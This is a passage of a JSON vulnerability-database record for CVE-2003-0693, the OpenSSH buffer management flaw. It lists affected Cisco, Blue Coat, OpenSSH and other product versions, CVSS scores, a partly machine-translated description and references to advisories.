"vendor": "cisco",
"version": "6.3(10)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.3(1)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.2(3)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.2(2)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.2(1)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.1(4)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.1(3)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.1(2)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.1(1)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.5(9)"
},
{
"model": "catos cv",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.5"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.5(8)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.5(7)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.5(6)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.5(5)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.5(4)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.5(3)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.5(2)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.5(19)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.5(18)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.5(17)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.5(16.2)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.5(16)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.5(15)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.5(14)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.5(13.5)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.5(13)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.5(12)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.5(11)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.5(10)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.5(1)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.4(4)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.4(3)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.4(2)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.4(1)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.2"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.2(7)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.2(6)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.2(5)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.2(4)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.2(3)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.2(2)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.2(1)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.1(1)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.5(9)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.5(8)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.5(7)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.5(6)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.5(5)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.5(4)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.5(3)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.5(2)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.5(13)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.5(12)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.5(11)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.5(10)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.5(1)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.4(1)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.3"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.2(2)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.2(1)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.1(3)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.1(2)"
},
{
"model": "catos",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.1(1)"
},
{
"model": "catalyst ws-x6380-nam",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "76003.1"
},
{
"model": "catalyst ws-svc-nam-2",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "76003.1"
},
{
"model": "catalyst ws-svc-nam-1",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "76003.1"
},
{
"model": "catalyst ws-svc-nam-2",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "76002.2"
},
{
"model": "catalyst ws-svc-nam-1",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "76002.2"
},
{
"model": "catalyst ws-x6380-nam",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "76002.1"
},
{
"model": "catalyst ws-x6380-nam",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "65003.1"
},
{
"model": "catalyst ws-svc-nam-2",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "65003.1"
},
{
"model": "catalyst ws-svc-nam-1",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "65003.1"
},
{
"model": "catalyst ws-svc-nam-2",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "65002.2"
},
{
"model": "catalyst ws-svc-nam-1",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "65002.2"
},
{
"model": "catalyst ws-x6380-nam",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "65002.1"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "60007.6(1)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "60007.5(1)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "60007.1(2)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "60007.1"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "60006.3(4)"
},
{
"model": "catalyst pan",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "60006.3"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "60006.2(0.111)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "60006.2(0.110)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "60006.1(2.13)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "60006.1(1)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "60005.5(4)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "60005.5(3)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "60005.5(2)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "60005.5(13)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "60005.5(1)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "60005.4.1"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "60005.4(4)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "60005.4(3)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "60005.4(2)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "60005.4(1)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "60005.4"
},
{
"model": "catalyst ws-x6380-nam",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "60003.1"
},
{
"model": "catalyst ws-svc-nam-2",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "60003.1"
},
{
"model": "catalyst ws-svc-nam-1",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "60003.1"
},
{
"model": "catalyst ws-svc-nam-2",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "60002.2"
},
{
"model": "catalyst ws-svc-nam-1",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "60002.2"
},
{
"model": "catalyst ws-x6380-nam",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "60002.1"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "50006.3(4)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "50006.1(3)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "50006.1(2)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "50006.1(1)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "50005.5(7)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "50005.5(6)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "50005.5"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "50005.5(4)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "50005.5(3)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "50005.5(2)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "50005.5(13)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "50005.5(1)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "50005.4.1"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "50005.4(4)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "50005.4(3)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "50005.4(2)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "50005.4(1)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "50005.2(4)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "50005.2(3)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "50005.2(2)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "50005.2(1)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "50005.2"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "50005.1(1)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "50004.5(9)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "50004.5(8)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "50004.5(7)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "50004.5(6)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "50004.5(5)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "50004.5(4)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "50004.5(3)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "50004.5(2)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "50004.5(12)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "50004.5(11)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "50004.5(10)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5000"
},
{
"model": "catalyst 4912g",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "40007.6(1)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "40007.5(1)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "40007.1.2"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "40007.1(2)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "40007.1"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "40006.3.5"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "40006.3(4)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "40006.1(1)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "40005.5.5"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "40005.5(4)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "40005.5(3)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "40005.5(2)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "40005.5(13)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "40005.5(1)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "40005.4.1"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "40005.4(3)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "40005.4(2)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "40005.4(1)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "40005.4"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "40005.2(7)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "40005.2(6)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "40005.2(5)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "40005.2(4)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "40005.2(2)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "40005.2(1)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "40005.1(1)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "40004.5(9)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "40004.5(8)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "40004.5(7)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "40004.5(6)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "40004.5(5)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "40004.5"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "40004.5(4)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "40004.5(3)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "40004.5(2)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "40004.5(10)"
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4000"
},
{
"model": "catalyst 2948g",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "catalyst",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "29005.5(13)"
},
{
"model": "catalyst 2980g-a",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "catalyst 2980g",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"model": "openlinux workstation",
"scope": "eq",
"trust": 0.3,
"vendor": "caldera",
"version": "3.1.1"
},
{
"model": "openlinux server",
"scope": "eq",
"trust": 0.3,
"vendor": "caldera",
"version": "3.1.1"
},
{
"model": "coat systems sgme",
"scope": "eq",
"trust": 0.3,
"vendor": "blue",
"version": "2.1.6"
},
{
"model": "coat systems sg2 secure proxy",
"scope": "eq",
"trust": 0.3,
"vendor": "blue",
"version": "0"
},
{
"model": "coat systems security gateway os",
"scope": "eq",
"trust": 0.3,
"vendor": "blue",
"version": "3.1"
},
{
"model": "coat systems security gateway os sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "blue",
"version": "2.1.5001"
},
{
"model": "coat systems security gateway os",
"scope": "eq",
"trust": 0.3,
"vendor": "blue",
"version": "2.1.9"
},
{
"model": "coat systems proxysg",
"scope": "eq",
"trust": 0.3,
"vendor": "blue",
"version": "0"
},
{
"model": "coat systems cacheos ca/sa",
"scope": "eq",
"trust": 0.3,
"vendor": "blue",
"version": "4.1.10"
},
{
"model": "os",
"scope": "ne",
"trust": 0.3,
"vendor": "snapgear",
"version": "1.8.5"
},
{
"model": "irix",
"scope": "ne",
"trust": 0.3,
"vendor": "sgi",
"version": "6.5.22"
},
{
"model": "p1",
"scope": "ne",
"trust": 0.3,
"vendor": "openssh",
"version": "3.7.1"
},
{
"model": "openssh",
"scope": "ne",
"trust": 0.3,
"vendor": "openssh",
"version": "3.7.1"
},
{
"model": "p1",
"scope": "ne",
"trust": 0.3,
"vendor": "openssh",
"version": "3.7"
},
{
"model": "openssh",
"scope": "ne",
"trust": 0.3,
"vendor": "openssh",
"version": "3.7"
},
{
"model": "ssh",
"scope": "ne",
"trust": 0.3,
"vendor": "f secure",
"version": "1.3.15"
},
{
"model": "catos",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "8.1(3)"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#333628"
},
{
"db": "BID",
"id": "8628"
},
{
"db": "JVNDB",
"id": "JVNDB-2003-000274"
},
{
"db": "CNNVD",
"id": "CNNVD-200309-032"
},
{
"db": "NVD",
"id": "CVE-2003-0693"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "3.7",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2003-0693"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "OpenSSH Security Advisory",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200309-032"
}
],
"trust": 0.6
},
"cve": "CVE-2003-0693",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": true,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2003-0693",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2003-0693",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#333628",
"trust": 0.8,
"value": "28.98"
},
{
"author": "CNNVD",
"id": "CNNVD-200309-032",
"trust": 0.6,
"value": "CRITICAL"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#333628"
},
{
"db": "JVNDB",
"id": "JVNDB-2003-000274"
},
{
"db": "CNNVD",
"id": "CNNVD-200309-032"
},
{
"db": "NVD",
"id": "CVE-2003-0693"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A \"buffer management error\" in buffer_append_space of buffer.c for OpenSSH before 3.7 may allow remote attackers to execute arbitrary code by causing an incorrect amount of memory to be freed and corrupting the heap, a different vulnerability than CVE-2003-0695. While the full impact of these vulnerabilities are unclear, they may lead to memory corruption and a denial-of-service situation. ------------ This vulnerability information is a summary of multiple vulnerabilities released at the same time. Please note that the contents of vulnerability information other than the title are included. ------------ OpenSSH Project More distributed OpenSSH 3.7 (Portable Edition OpenSSH 3.7p1) Previously, there were deficiencies in buffer management. If a remote attacker receives a packet of a deliberate length that frees other nearby areas when releasing the buffer, the heap area can be destroyed. As a result, remote attackers who exploit this issue sshd Can be put into a denial of service, and arbitrary code execution has been suggested. The routine in which the problem exists is OpenSSH Others that are using similar routines since being used since the initial release of SSH The implementation of may also be affected. SSH Secure Shell/Ciso IOS Has been reported by the vendor to be unaffected by this issue. Also, F-Secure SSH about, 1.3.14 (for Unix) Previously affected, 2.x Since then, the vendor has reported that it will not be affected. Initially this problem (CAN-2003-0693) Is buffer.c Inside buffer_append_space() Discovered in the function, OpenSSH 3.7p1 It was solved with. However, since a similar problem was discovered in other places after that, this problem was solved. OpenSSH 3.7.1p1 Has been released. (CAN-2003-0695) In addition, memory management issues that are different from the above issues (CAN-2003-0682) Has also been reported, OpenSSH 3.7.1p2 It can be solved by updating to. still, Red Hat Linux About the vendor 2003 Year 9 Moon 17 Advisory published by date (RHSA-2003:279-17) Indicated in RPM Updates to the package, Turboinux About the vendor 2003 Year 9 Moon 24 Advisory published on date (TLSA-2003-53) All of these issues are due to updates to the packages indicated in (CAN-2003-0682/CAN-2003-0693/CAN-2003-0695) Can be eliminated.Please refer to the \u201cOverview\u201d for the impact of this vulnerability. The issue may cause a denial of service. This condition can reportedly be triggered by an overly large packet. \nThere are also unconfirmed rumors of an exploit for this vulnerability circulating in the wild. \nOpenSSH has revised their advisory, pointing out a similar issue in the \u0027channels.c\u0027 source file and an additional issue in \u0027buffer.c\u0027. Solar Designer has also reportedly pointed out additional instances of the problem that may also present vulnerabilities",
"sources": [
{
"db": "NVD",
"id": "CVE-2003-0693"
},
{
"db": "CERT/CC",
"id": "VU#333628"
},
{
"db": "JVNDB",
"id": "JVNDB-2003-000274"
},
{
"db": "BID",
"id": "8628"
}
],
"trust": 2.61
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#333628",
"trust": 3.2
},
{
"db": "NVD",
"id": "CVE-2003-0693",
"trust": 2.7
},
{
"db": "XF",
"id": "13191",
"trust": 1.4
},
{
"db": "BID",
"id": "8628",
"trust": 1.1
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2024/07/01/3",
"trust": 1.0
},
{
"db": "SECUNIA",
"id": "10156",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2003-000274",
"trust": 0.8
},
{
"db": "FULLDISC",
"id": "20030916 THE LOWDOWN ON SSH VULNERABILITY",
"trust": 0.6
},
{
"db": "FULLDISC",
"id": "20030915 NEW SSH EXPLOIT?",
"trust": 0.6
},
{
"db": "FULLDISC",
"id": "20030915 OPENSSH REMOTE EXPLOIT",
"trust": 0.6
},
{
"db": "OVAL",
"id": "OVAL:ORG.MITRE.OVAL:DEF:447",
"trust": 0.6
},
{
"db": "OVAL",
"id": "OVAL:ORG.MITRE.OVAL:DEF:2719",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20030916 OPENSSH BUFFER MANAGEMENT BUG ADVISORY",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20030917 [OPENPKG-SA-2003.040] OPENPKG SECURITY ADVISORY (OPENSSH)",
"trust": 0.6
},
{
"db": "BUGTRAQ",
